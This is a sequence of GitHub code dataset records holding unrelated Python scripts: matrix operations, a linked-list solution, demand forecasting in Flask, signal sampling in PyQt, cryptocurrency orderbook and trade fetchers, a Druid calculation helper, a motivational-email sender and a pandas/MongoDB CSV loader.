self.columns)\n print(\"Enter \" + n + \"matrix\")\n self.elements = [[num(e) for e in input().split()] for _ in range(self.rows)]\n\n def column(self, i):\n return list([self.elements[j][i] for j in range(self.rows)])\n\n def __str__(self):\n if not self.ok:\n return \"The operation cannot be performed.\"\n return \"The result is:\\n\" + \"\\n\".join([' '.join([f\"{round(x, 3):>7}\"\n for x in row]) for row in self.elements])\n\n def const_multi(self, const):\n self.elements = [[const * e for e in row] for row in self.elements]\n return self\n\n def add(self, add_m):\n if self.size == add_m.size:\n for r in range(self.rows):\n for c in range(self.columns):\n self.elements[r][c] += add_m.elements[r][c]\n return self\n else:\n self.ok = False\n\n def multiply(self, mult_m):\n if self.columns == mult_m.rows:\n tmp = []\n for r in range(self.rows):\n row = []\n for c in range(mult_m.columns):\n row.append(sum(map(lambda x, y: x * y, self.elements[r], mult_m.column(c))))\n tmp.append(row)\n self.elements = tmp\n return self\n else:\n self.ok = False\n\n def transp_main(self):\n self.elements = [[x for x in self.column(i)] for i in range(self.columns)]\n return self\n\n def transp_side(self):\n self.elements = [[x for x in reversed(self.column(i - 1))] for i in range(self.columns, 0, -1)]\n return self\n\n def transp_vertical(self):\n self.elements = [reversed(row) for row in self.elements]\n return self\n\n def transp_horisontal(self):\n self.elements = [row for row in reversed(self.elements)]\n return self\n\n def minor(self, row, column):\n m_minor = Matrix(size=(self.rows - 1, self.columns - 1))\n m_minor.elements = [self.elements[r][:column] + self.elements[r][column + 1:]\n for r in range(len(self.elements)) if r != row]\n return m_minor\n\n def cofactor(self, row, column):\n return (-1) ** (row + column) * self.minor(row, column).determinant()\n\n def determinant(self):\n if self.rows == self.columns:\n if len(self.elements) == 1:\n return self.elements[0][0]\n return sum(map(lambda i: self.elements[0][i] * self.cofactor(0, i), [i for i in range(self.rows)]))\n else:\n self.ok = False\n\n def inverse(self):\n if self.rows == self.columns and self.determinant():\n d = self.determinant()\n self.elements = [[self.cofactor(r, c) for c in range(self.columns)] for r in range(self.rows)]\n self.transp_main().const_multi(1 / d)\n return self\n else:\n self.ok = False\n\n\ndef num(s):\n try:\n return int(s)\n except ValueError:\n return float(s)\n\n\nwhile True:\n print('1. Add matrices\\n2. Multiply matrix by a constant\\n'\n '3. Multiply matrices\\n4. Transpose matrix\\n'\n '5. Calculate a determinant\\n6. Inverse matrix\\n0. Exit')\n choice = int(input(\"Your choice: \"))\n\n if choice == 0:\n break\n elif choice == 1:\n print(Matrix(n=\"first \").add(Matrix(n=\"second \")))\n elif choice == 2:\n print(Matrix().const_multi(int(input(\"Enter constant:\"))))\n elif choice == 3:\n print(Matrix(n=\"first \").multiply(Matrix(n=\"second \")))\n elif choice == 4:\n print('1. Main diagonal\\n2. Side diagonal\\n'\n '3. Vertical line\\n4. Horizontal line\\n0. Exit')\n choice = int(input(\"Your choice: \"))\n if choice == 1:\n print(Matrix().transp_main())\n elif choice == 2:\n print(Matrix().transp_side())\n elif choice == 3:\n print(Matrix().transp_vertical())\n else:\n print(Matrix().transp_horisontal())\n elif choice == 5:\n print(f\"The result is:\\n{Matrix().determinant()}\")\n elif choice == 6:\n print(Matrix().inverse())\n print()\n","repo_name":"py-cs/matrices","sub_path":"processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16814007602","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n if not headA or not headB:\n return None\n\n hA = headA\n while hA.next:\n hA = hA.next\n\n tail = hA\n tail.next = headA\n\n intersection = None\n hb1 = headB\n hb2 = headB\n\n while hb1 and hb2:\n hb1 = hb1.next\n hb2 = hb2.next\n if hb2:\n hb2 = hb2.next\n if hb1 == hb2:\n break\n\n if hb1 and hb2 and hb1 == hb2:\n hb1 = headB\n while hb1 != hb2:\n hb1 = hb1.next\n hb2 = hb2.next\n\n intersection = hb1\n\n tail.next = None\n\n return intersection\n\n\nif __name__ == \"__main__\":\n s = Solution()\n","repo_name":"vishwakt/A-Problem-A-Day","sub_path":"160_intersection_of_two_linked_lists.py","file_name":"160_intersection_of_two_linked_lists.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33745115084","text":"import flask\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom flask import request, send_file\n\ncsv = r'Historical Product Demand.csv'\ndf = pd.read_csv(csv)\n# df.head(10)\n\napp = flask.Flask(__name__)\n\n@app.route('/demand', methods=['POST'])\ndef getDemand():\n req = request.get_json(force=True)\n cat = req['category']\n groupByCategory = df.groupby(['Product_Category']).size().reset_index(name='counts').sort_values(['counts'],ascending=False)\n # groupByCategory.head(10)\n\n categoryDf = df.loc[df['Product_Category'] == cat].sort_values(['Date'],ascending=False)\n categoryDf = categoryDf.drop(columns=['Warehouse','Product_Code','Product_Category'])\n # categoryDf.describe()\n\n categoryDf.index=pd.to_datetime(categoryDf.Date,format='%Y/%m/%d')\n categoryDf.drop(columns=['Date'],inplace=True)\n categoryDf['Order_Demand'] = categoryDf['Order_Demand'].astype(str)\n categoryDf['Order_Demand'] = categoryDf['Order_Demand'].map(lambda x: x.lstrip('(').rstrip(')'))\n categoryDf['Order_Demand'] = categoryDf['Order_Demand'].astype(int)\n\n categoryDemand = categoryDf.resample('M').sum()\n # categoryDemand.head(10)\n\n # categoryDemand.drop(categoryDemand.loc[categoryDemand['Order_Demand']==100000].index,inplace=True)\n # categoryDemand.Order_Demand.plot(figsize=(13,6), title= 'Product 1359 Demand', fontsize=14,color=\"Green\")\n\n train = categoryDemand[:'2016-03-31']\n test = categoryDemand['2016-04-30':]\n\n # train.Order_Demand.plot(figsize=(13,6), title= 'Product 1359 - Train and Test', fontsize=12,color=\"Green\")\n # test.Order_Demand.plot(figsize=(13,6), title= 'Product 1359 - Train and Test', fontsize=12)\n\n from statsmodels.tsa.api import SimpleExpSmoothing\n y_hat_avg = test.copy()\n fit2 = SimpleExpSmoothing(np.asarray(train['Order_Demand'])).fit(smoothing_level=0.6,optimized=False)\n y_hat_avg['SES'] = fit2.forecast(len(test))\n plt.figure(figsize=(14,6))\n plt.plot(train['Order_Demand'], label='Train',color=\"Green\")\n plt.plot(test['Order_Demand'], label='Test')\n plt.plot(y_hat_avg['SES'], label='SES',color=\"Red\")\n plt.title(\"Simple Smoothing\")\n plt.legend(loc='best')\n\n # # Exponential Smoothing\n\n # exp_hat_avg = test.copy()\n # fit1 = ExponentialSmoothing(np.asarray(train['Order_Demand']) ,seasonal_periods=4 ,trend='additive', seasonal='additive',).fit()\n # exp_hat_avg['Exp_Smooth'] = fit1.forecast(len(test))\n # plt.figure(figsize=(14,6))\n # plt.plot( train['Order_Demand'], label='Train',color=\"Green\")\n # plt.plot(test['Order_Demand'], label='Test')\n # plt.plot(exp_hat_avg['Exp_Smooth'], label='Exp_Smooth',color=\"Red\")\n # plt.legend(loc='best')\n # plt.title(\"Exponential Smoothing\");\n plt.savefig('demand.png')\n plt.show()\n\n import matplotlib.image as mpimg\n img = mpimg.imread('demand.png')\n plt.imshow(img)\n\n return send_file(img, mimetype='image/gif')\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)","repo_name":"tsuresh/Jansss","sub_path":"datascience/wip/demandPrediction.py","file_name":"demandPrediction.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15723002781","text":"import numpy as np\nimport pandas as pd\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtCore as qtc\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QFileDialog\nfrom scipy import signal\n\nfrom Sampling_and_reconstruction_canvas import Sampling_and_reconstruction_canvas\nfrom Fourier_package import get_f_max\n\nclass Sampler(QtWidgets.QWidget):\n\n def __init__(self):\n super().__init__()\n uic.loadUi(\"UI/Sampler.ui\", self)\n self.sampel_and_reco_canvas =Sampling_and_reconstruction_canvas()\n self.Canvas_layout.addWidget(self.sampel_and_reco_canvas )\n\n self.time=[]\n self.values=[]\n self.max_freq=0\n self.Freq_rate_slider.setValue(10)\n self.Freq_rate_slider.valueChanged.connect(self.sample_signal)\n self.toggel_button.clicked.connect(self.toggel_visability_second_axes)\n self.CSV_load_button.clicked.connect(self.load_external_signal)\n\n def clear_canvas(self):\n self.sampel_and_reco_canvas.clear_canvas()\n\n def init_canvas(self):\n self.clear_canvas()\n self.sample_signal()\n\n def move_to_sampler(self,time,values,max_freq):\n self.load_composed_signal(time,values,max_freq)\n self.plot_composed_signal()\n\n\n def load_composed_signal(self,time,values,max_freq):\n self.time=time\n self.values=values\n self.max_freq=max_freq\n self.Lcd_max_freq.display(max_freq)\n\n def plot_composed_signal(self):\n self.sampel_and_reco_canvas.plot_composed_signal(self.time,self.values)\n\n\n def sample_signal(self):\n values = np.array(self.values)\n # print(\"inside sample\")\n\n factor = (self.Freq_rate_slider.value()/10)\n self.Slider_lable.setText(\"{F_max}F-max\".format(F_max = factor))\n sampling_freq =factor*self.max_freq\n # print(\"sampling_freq sample\")\n sampled_time_points = np.arange(self.time[0],self.time[-1],1/sampling_freq)\n\n # print((self.values))\n sampled_values_points= values[np.searchsorted(self.time,sampled_time_points)]\n\n reconstructed_signal = self.reconstruct_signal(sampled_values_points,len(self.time))\n\n self.clear_canvas()\n self.plot_composed_signal()\n self.plot_reconstructed_signal(self.time,sampled_time_points,sampled_values_points,reconstructed_signal)\n\n\n def reconstruct_signal(self,sampled_values_points,num_points):\n reconstructed_signal = signal.resample(sampled_values_points, num_points)\n return reconstructed_signal\n\n\n\n def plot_reconstructed_signal(self,time,sampled_time_points,sampled_values_points,reconstructed_signal):\n self.sampel_and_reco_canvas.plot_reconstructed_signal(self.time,reconstructed_signal)\n self.sampel_and_reco_canvas.plot_sampled_scatterd_signal(sampled_time_points,sampled_values_points)\n self.sampel_and_reco_canvas.plot_final_reconstructed_signal(self.time,reconstructed_signal)\n\n def toggel_visability_second_axes(self):\n # print(\"iiiiiiiiiiiiiiiii\")\n self.sampel_and_reco_canvas.toggel_visability_second_axes()\n\n\n\n def load_external_signal(self):\n time , values =self.Load_csv_file()\n self.time=time.values\n self.values=values.values\n # print(self.values)\n self.max_freq = self.get_f_max_from_external_signal(time , values)\n self.Lcd_max_freq.display(self.max_freq)\n self.init_canvas()\n self.plot_external_signal()\n\n def Load_csv_file(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self, \"Choose File\", \"\", \"csv (*.csv)\",\n options=options)\n df = pd.read_csv(fileName)\n time = df.iloc[:, 0]\n values = df.iloc[:, 1]\n return time , values\n\n def get_f_max_from_external_signal(self,time,data):\n max_freq=get_f_max(time,data)\n return max_freq\n\n def plot_external_signal(self):\n self.sampel_and_reco_canvas.plot_composed_signal(self.time,self.values)","repo_name":"saied-salem/Sampling-and-Reconstruction-Studio","sub_path":"src/Sampler.py","file_name":"Sampler.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16869852090","text":"import Settings\nimport json, base64, hashlib, urlparse, hmac, time, websocket, thread, copy\nfrom websocket import create_connection\nfrom coincheck import *\n\nbids = []\nasks = []\n\ncoincheckapi.get_orderbook()\n\nraise SystemExit\n\ndef on_message(ws, message):\n global bids, asks\n message = json.loads(message)\n \n print(message[1]['bids'])\n \n\ndef on_error(ws, error):\n print(error)\n\ndef on_close(ws):\n print('Connection closed')\n\ndef on_open(ws):\n request = {\"type\": \"subscribe\", \"channel\": \"btc_jpy-orderbook\"}\n ws.send(json.dumps(request))\n print('Requested orderbook updates')\n\nwebsocket.enableTrace(True)\nws = websocket.WebSocketApp(Settings.url,\n on_message = on_message,\n on_error = on_error,\n on_close = on_close\n)\nws.on_open = on_open\nws.run_forever()","repo_name":"hale0124/CoinCheck-Sniper","sub_path":"machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"15321791975","text":"from pydruid.utils.filters import Filter\n\nfrom config.druid_base import FIELD_NAME\nfrom db.druid.calculations.base_calculation import BaseCalculation\nfrom db.druid.calculations.simple_calculation import SumCalculation\n\n# Optimize a composite calculation that would normally sum multiple child fields\n# using a post aggregator into a single SumCalculation that can calculate those\n# child fields directly in a single aggregation. If the calculation cannot be\n# optimized, return None.\ndef optimize_composite_calculation(composite_id, children_calculation, child_fields):\n # Cannot optimize if there are post aggregations combining multiple fields.\n if children_calculation.post_aggregations:\n return None\n\n filter_fields = set()\n aggregations = children_calculation.aggregations\n for field in child_fields:\n field_agg = aggregations.get(field)\n\n # If an aggregation is missing for this field (this should never happen)\n # or the aggregator is not a dictionary (implies it is a more complex\n # type), then we cannot optimize.\n if not field_agg or not isinstance(field_agg, dict):\n return None\n\n # All child fields should be filtered sum calculations where the filter\n # limits the aggregator to just the fields needed to compute the child\n # field.\n if (\n field_agg['type'] != 'filtered'\n or field_agg['aggregator']['type'] != 'doubleSum'\n ):\n return None\n\n # Only can optimize simple dimension filters (like selector or in) that\n # filter over the field dimension.\n agg_filter = field_agg['filter']\n if agg_filter.get('dimension') != FIELD_NAME:\n return None\n\n filter_type = agg_filter['type']\n if filter_type == 'selector':\n filter_fields.add(agg_filter['value'])\n elif filter_type == 'in':\n filter_fields.update(agg_filter['values'])\n else:\n return None\n\n composite_filter = (\n Filter(dimension=FIELD_NAME, value=filter_fields.pop())\n if len(filter_fields) == 1\n else Filter(type='in', dimension=FIELD_NAME, values=sorted(filter_fields))\n )\n\n return SumCalculation.create_with_filter(\n field=composite_id, agg_filter=composite_filter\n )\n\n\ndef build_composite_indicator_calculation(\n composite_id, children_calculation, child_fields\n):\n '''Create a full calculation for the composite indicator that combines the\n child field calculations into a single calculation.\n\n Args:\n composite_id: The composite indicator ID the final value will be stored\n under.\n children_calculation: A Calculation object (deriving from\n BaseCalculation) that has all aggregations/post aggregations built\n for the child fields.\n child_fields: The list of child fields this composite indicator is\n combining.\n '''\n optimized_calculation = optimize_composite_calculation(\n composite_id, children_calculation, child_fields\n )\n if optimized_calculation:\n return optimized_calculation\n\n # Clone the calculation so we do not modify it in place.\n full_calculation = BaseCalculation(\n aggregations=children_calculation.aggregations,\n post_aggregations=children_calculation.post_aggregations,\n strict_null_fields=children_calculation.strict_null_fields,\n )\n formula = ' + '.join(child_fields)\n full_calculation.add_post_aggregation_from_formula(composite_id, formula)\n return full_calculation\n","repo_name":"Zenysis/Harmony","sub_path":"data/composite_indicator/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"28480811984","text":"\"\"\"\r\nI developed this project to help my girlfriend by sending motivational messages every hour. You can use it for your partner as well :)\r\n\r\n\"\"\"\r\n\r\n\r\nimport random\r\nimport time\r\nimport requests\r\nimport json\r\n\r\n# SendGrid API key\r\nsendgrid_api_key = 'privatesnedgridapikey'\r\n\r\n# List of motivacional messages \r\nmensajes_motivacionales = [\r\n 'No te rindas, todo esfuerzo tiene su recompensa.',\r\n 'El éxito no es la clave de la felicidad. La felicidad es la clave del éxito.',\r\n 'Sólo se vive una vez, pero si lo haces bien, una vez es suficiente.',\r\n 'No tengas miedo de renunciar a lo bueno para perseguir lo grandioso.',\r\n 'La felicidad no es algo hecho. Viene de tus propias acciones.',\r\n 'Si puedes soñarlo, puedes lograrlo.',\r\n 'No esperes oportunidades, créalas.',\r\n 'No te preocupes por los fracasos, preocúpate por las oportunidades que pierdes al no intentarlo.',\r\n 'El éxito es la suma de pequeños esfuerzos repetidos día tras día.',\r\n 'Nunca es tarde para ser lo que podrías haber sido.'\r\n]\r\n\r\n# Function to randomnly send messages using Sendgrid API through email\r\ndef enviar_mensaje():\r\n mensaje = random.choice(mensajes_motivacionales)\r\n destino = 'receiverEmail'\r\n asunto = 'Mensaje motivacional del día'\r\n cuerpo = f'Hola,\\n\\n{mensaje}\\n\\nSaludos,\\npara recordarte que tu puedes'\r\n \r\n data = {\r\n \"personalizations\": [\r\n {\r\n \"to\": [\r\n {\r\n \"email\": destino\r\n }\r\n ],\r\n \"subject\": asunto\r\n }\r\n ],\r\n \"from\": {\r\n \"email\": \"Sender email\"\r\n },\r\n \"content\": [\r\n {\r\n \"type\": \"text/plain\",\r\n \"value\": cuerpo\r\n }\r\n ]\r\n }\r\n \r\n headers = {\r\n 'Authorization': f'Bearer {sendgrid_api_key}',\r\n 'Content-Type': 'application/json'\r\n }\r\n\r\n response = requests.post('https://api.sendgrid.com/v3/mail/send', data=json.dumps(data), headers=headers)\r\n print(response.status_code)\r\n\r\n# Send message every hour \r\nfor i in range(10):\r\n enviar_mensaje()\r\n time.sleep(3600) ","repo_name":"nicogacia2509/MessagesPartner","sub_path":"mensajesNari.py","file_name":"mensajesNari.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18582510524","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# with open('account.txt','w',encoding='utf8') as f:\n# f.write('结算日期\t资产/w\t负债/w\t净资产/w')\n#\n# with open('recording.txt','w',encoding='utf8') as f:\n# f.write('交易对象\t收入/w\t支出/w\t应收账款/w\t应出账款/w\t交易日期')\n\nimport datetime\n\ntoday = datetime.date.today()\n\n\ndef input_d(prompt):\n while True:\n d = input(prompt)\n if d.isdigit():\n return d\n else:\n print('输入有误,请输入数字.')\n\n\ndef input_s(prompt):\n while True:\n d = input(prompt)\n if d.isalnum():\n return d\n else:\n print('输入有误,请输入数字或字母.')\n\n\ndef select_assets():\n day, asset, liability, net_asset = '0', '0', '0', '0'\n with open('account.txt', 'r', encoding='utf8') as f_1:\n lines = f_1.readlines()\n if len(lines) > 1:\n new_assets = lines[len(lines) - 1]\n assets_list = new_assets.split()\n day = assets_list[0]\n asset = assets_list[1]\n liability = assets_list[2]\n net_asset = assets_list[3]\n\n return day, asset, liability, net_asset\n\n\ndef show_assets():\n day, asset, liability, net_asset = select_assets()\n print('最新资产:%s 万\\n最新负债:%s 万\\n最新净资产:%s 万\\n最后更新日期:%s\\n'\n % (asset, liability, net_asset, day))\n\n\ndef recording():\n day, assets, liability, net_asset = select_assets()\n deal_op = input_s(\"交易对象:\")\n income_n = input_d(\"收入/万:\")\n expend_n = input_d(\"支出/万:\")\n receivable_n = input_d(\"应收账款/万:\")\n payable_n = input_d(\"应出账款/万:\")\n assets = int(assets) + int(income_n) - int(expend_n) # 资产=资产+收入-支出\n liability = int(liability) + int(payable_n) - int(receivable_n) # 负债=负债+应出账款-应收账款\n net_asset = assets - liability\n records = '\\n' + deal_op + '\\t' + income_n + '\\t' + expend_n + '\\t' + receivable_n + '\\t' + payable_n + '\\t' + str(\n today)\n accounts = '\\n' + str(today) + '\\t' + str(assets) + '\\t' + str(liability) + '\\t' + str(net_asset)\n with open('recording.txt', 'a', encoding='utf8') as f_w:\n f_w.write(records)\n with open('account.txt', 'a', encoding='utf8') as f_w1:\n f_w1.write(accounts)\n print('记账成功!')\n show_assets()\n\n\n# 最近10条交易记录\ndef last_ten():\n result = []\n with open('recording.txt', 'r', encoding='utf8') as f:\n lines = f.readlines()\n lines_len = len(lines)\n # print(lines[1:lines_len])\n if 1 < lines_len < 11:\n result = lines[1:lines_len]\n print('总记录不满十条...')\n elif lines_len >= 11:\n result = lines[-10:]\n else:\n print('----查询无记录-----')\n return\n print('交易对象\t收入\t支出\t应收账款\t应出账款\t交易日期')\n for i in result:\n print(i.replace('\\n', ''))\n\n\ndef read_all_records():\n with open('recording.txt', 'r', encoding='utf8') as f:\n lines = f.readlines()\n return lines\n\n\n# 与某公司的交易往来\ndef deal_with_key(key):\n key_result = []\n all_records = read_all_records()\n for i in all_records:\n if i.find(key) >= 0:\n key_result.append(i)\n if len(key_result) == 0:\n print('----查询无记录----')\n return\n print('交易对象\t收入\t支出\t应收账款\t应出账款\t交易日期')\n for i in key_result:\n print(i.replace('\\n', ''))\n\n\ndef sub_select(flag):\n if flag_2 == '1':\n key = input_s(\"请输入公司名称:\")\n deal_with_key(key)\n elif flag_2 == '2':\n last_ten()\n else:\n show_assets()\n\n\ndef go_or_stop():\n if input('按任意键继续,按Q结束').lower() == 'q':\n print('谢谢使用!再见')\n return False\n else:\n print('欢迎继续使用')\n return True\n\n\ngo_flag = True\nwhile go_flag:\n print(\"1.查账;2.记账\")\n flag_1 = input_d(\"请选择服务:\")\n if flag_1 == '2':\n recording()\n go_flag = go_or_stop()\n else:\n print('1.查询与某公司的贸易往来\\n2.查询最近十笔交易记录\\n3.查询最新资产负债情况')\n flag_2 = input_d(\"请选择:\")\n sub_select(flag_2)\n go_flag = go_or_stop()\n","repo_name":"leledada/LearnPython","sub_path":"account_program/accounting_program.py","file_name":"accounting_program.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70576974246","text":"import requests\nimport time\nimport csv\nimport sys\nfrom datetime import datetime\n\nBASE_URL = \"https://api.binance.com/api/v3/aggTrades\"\n\ndef log_message(message, log_file):\n \"\"\"Write a message to the log file and print it to the console.\"\"\"\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n with open(log_file, 'a') as log:\n log.write(f\"{timestamp} - {message}\\n\")\n print(f\"{timestamp} - {message}\")\n\ndef date_to_epoch(date_str):\n \"\"\"Convert a date string (YYYY-MM-DD) to epoch timestamp in milliseconds.\"\"\"\n dt = datetime.strptime(date_str, '%Y-%m-%d')\n return int(dt.timestamp() * 1000)\n\ndef fetch_binance_data(symbol, startTime, endTime, log_file_name, limit=1000):\n all_trades = []\n last_trade_timestamp = 0\n\n while True:\n params = {\n \"symbol\": symbol,\n \"startTime\": max(startTime, last_trade_timestamp + 1),\n \"endTime\": endTime,\n \"limit\": limit\n }\n\n response = requests.get(BASE_URL, params=params)\n \n if response.status_code == 200:\n trades = response.json()\n if isinstance(trades, dict) and \"code\" in trades and \"msg\" in trades:\n log_message(f\"Error fetching data: {trades['msg']}\", log_file_name)\n return all_trades\n valid_trades = [trade for trade in trades if not (trade[\"p\"] == '0' and trade[\"q\"] == '0' and trade[\"f\"] == -1 and trade[\"l\"] == -1)]\n log_message(f\"Fetched {len(valid_trades)} records for the interval {params['startTime']} to {params['endTime']}.\", log_file_name)\n all_trades.extend(valid_trades)\n\n if len(valid_trades) < limit:\n break\n else:\n last_trade_timestamp = valid_trades[-1][\"T\"]\n else:\n log_message(f\"Error {response.status_code}: {response.text}\", log_file_name)\n return all_trades\n\n return all_trades\n\ndef fetch_data_for_timeframe(symbol, start_date, end_date, output_file, log_file_name):\n current_start = date_to_epoch(start_date)\n end_timestamp = date_to_epoch(end_date) + (24 * 60 * 60 * 1000) - 1\n\n # Write the CSV header only once at the beginning\n with open(output_file, 'w', newline='') as csvfile:\n fieldnames = [\"Aggregate tradeId\", \"Price\", \"Quantity\", \"First tradeId\", \"Last tradeId\", \"Timestamp\", \"Was the buyer the maker?\", \"Was the trade the best price match?\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n while current_start < end_timestamp:\n current_end = current_start + (24 * 60 * 60 * 1000)\n if current_end > end_timestamp:\n current_end = end_timestamp\n\n data = fetch_binance_data(symbol, current_start, current_end, log_file_name)\n\n # Save the fetched data for the current day to the CSV\n with open(output_file, 'a', newline='') as csvfile:\n fieldnames = [\"Aggregate tradeId\", \"Price\", \"Quantity\", \"First tradeId\", \"Last tradeId\", \"Timestamp\", \"Was the buyer the maker?\", \"Was the trade the best price match?\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n for row in data:\n writer.writerow({\n \"Aggregate tradeId\": row[\"a\"],\n \"Price\": row[\"p\"],\n \"Quantity\": row[\"q\"],\n \"First tradeId\": row[\"f\"],\n \"Last tradeId\": row[\"l\"],\n \"Timestamp\": row[\"T\"],\n \"Was the buyer the maker?\": row[\"m\"],\n \"Was the trade the best price match?\": row[\"M\"]\n })\n\n log_message(f\"Data for interval {current_start} to {current_end} written to {output_file}\", log_file_name)\n current_start = current_end\n time.sleep(1.1)\n\n log_message(f\"Data fetching and saving completed for {start_date} to {end_date}.\", log_file_name)\n\n\ndef main():\n start_time = time.time()\n\n symbol = \"BTCUSDT\"\n \n # Check for command-line arguments for start_date and end_date\n if len(sys.argv) == 3:\n start_date = sys.argv[1]\n end_date = sys.argv[2]\n else:\n start_date = input(\"Enter the start date (YYYY-MM-DD): \")\n end_date = input(\"Enter the end date (YYYY-MM-DD): \")\n\n output_file = f\"binance_data_{start_date}_to_{end_date}.csv\"\n log_file_name = f\"binance_data_log_{start_date}_to_{end_date}.txt\"\n \n fetch_data_for_timeframe(symbol, start_date, end_date, output_file, log_file_name)\n\n end_time = time.time()\n elapsed_time = end_time - start_time\n log_message(f\"Script completed in {elapsed_time:.2f} seconds.\", log_file_name)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"garyzava/excess-return-analysis","sub_path":"other_sources/binance_api_fetcher.py","file_name":"binance_api_fetcher.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21251512476","text":"import csv\nfrom datetime import datetime, timedelta\nimport io\nimport pandas as pd\nimport numpy as np\n\nimport pymongo\nimport math\n\n# To run mongod in Windows: mongod --dbpath ~/data &\n# Configure MongoDB\n\nconnection = pymongo.MongoClient('mongodb://localhost:27017')\ndb = connection['catalog']\n\ndef create_recording(aType, _datetime, count):\n assert aType is not None\n assert _datetime is not None\n assert count is not None\n\n db.recordings.insert_one({\n \"type\": aType,\n \"datetime\": _datetime,\n \"count\": count,\n })\n\ndef upload_recording_to_df(file):\n assert file is not None\n\n #data = file.read()\n df1 = pd.read_csv(file, header=0, encoding = \"utf-8\")\n aList = []\n\n for index, row in df1.iterrows():\n aList.append([row[\"Id\"], row[\"created_at\"], row['Type'], 1])\n\n df2 = pd.DataFrame(aList, columns=['id', 'created_at', 'type', 'count'])\n\n df2[\"created_at\"] = pd.to_datetime(df2[\"created_at\"])\n df2[\"Date_received_year\"] = pd.DatetimeIndex(df2[\"created_at\"]).year\n df2[\"Date_received_qtr\"] = df2[\"created_at\"].dt.quarter\n df2[\"Date_received_year_qtr\"] = df2[\"Date_received_year\"].astype(str) + ' Q' + df2[\"Date_received_qtr\"].astype(str) \n\n df3 = pd.pivot_table(df2, values=\"count\", index=[\"Date_received_year_qtr\"], columns=[\"type\"], aggfunc=np.sum)\n \n return df3\n\ndef csv_to_dict(file):\n\n with file as read_obj:\n # pass the file object to DictReader() to get the DictReader object\n dict_reader = csv.DictReader(read_obj)\n # get a list of dictionaries from dct_reader\n list_of_dict = list(dict_reader)\n # print list of dict i.e. rows\n return (list_of_dict)\n\ndef upload_recording_to_mongodb(file, db):\n\n assert file is not None\n\n dictList = csv_to_dict(file)\n for aDict in dictList:\n aDict[\"created_at\"] = datetime.strptime(aDict['created_at'], \"%a %b %d %H:%M:%S %z %Y\")\n aDict[\"Date_received_year\"] = aDict[\"created_at\"].year\n aDict['Date_received_qtr'] = math.ceil(aDict[\"created_at\"].month/3)\n aDict['Date_received_year_qtr'] = str(aDict[\"Date_received_year\"]) + \"-\" + str(aDict[\"Date_received_qtr\"])\n db.recordings.insert_one(aDict)\n\n#f1 = open(\"static/sample.csv\", \"r\")\n#f2 = open(\"static/countByQuarter.csv\", \"w\")\n\n# // Using Pandas\n#df2 = upload_recording_to_df(f1)\n# print(df2.index.to_list())\n# print(df2.columns.to_list())\n# df2['text'] = df2['text'].fillna(0)\n# print(df2['text'].to_list())\n\n# // Using MongoDB\n\n#upload_recording_to_mongodb(f1, db)\n\ndef pivotCount(db):\n\n results = db.recordings.aggregate(\n [\n # count occurence\n # https://stackoverflow.com/questions/27177836/how-to-count-all-occurrences-of-an-element-in-mongodb \n\n {\"$group\":{\"_id\":\"$Type\",\"count\":{\"$sum\": 1}}},\n #{\"$project\":{\"Type\":\"$_id\",\"occurance\":\"$count\"}}\n {\"$project\":{\"count\": 1}}\n\n ]\n )\n\n return results\n\n# results = pivotCount(db)\n\n# for record in results:\n# print(record)\n\nf1 = open(\"static/DataSet2.csv\", \"r\")\n#f2 = open(\"static/DataSet3.csv\", \"w\")\n\n# def rePopulate(f1, f2):\n\n# dictList = csv_to_dict(file)\n\n# for aDict in dictList:\n# aDict[\"created_at\"] = datetime.strptime(aDict['created_at'], \"%a %b %d %H:%M:%S %z %Y\")\n# aDict[\"Date_received_year\"] = aDict[\"created_at\"].year\n# aDict['Date_received_qtr'] = math.ceil(aDict[\"created_at\"].month/3)\n# aDict['Date_received_year_qtr'] = str(aDict[\"Date_received_year\"]) + \"-\" + str(aDict[\"Date_received_qtr\"])\n# db.recordings.insert_one(aDict)\n\n\ndata = csv_to_dict(f1)\n\nreadings={}\nbDate = datetime(3000, 1, 1)\nlDate = datetime(2000, 12, 31)\n\ndef getReadings(data):\n\n readings = {}\n bDate = datetime(3000, 1, 1)\n lDate = datetime(2000, 12, 31)\n\n for item in data:\n\n parts = [int(x) for x in item['Date'].split('-')]\n myDate = datetime(parts[0], parts[1], parts[2])\n\n if myDate <= bDate:\n bDate = myDate\n\n if myDate >= lDate:\n 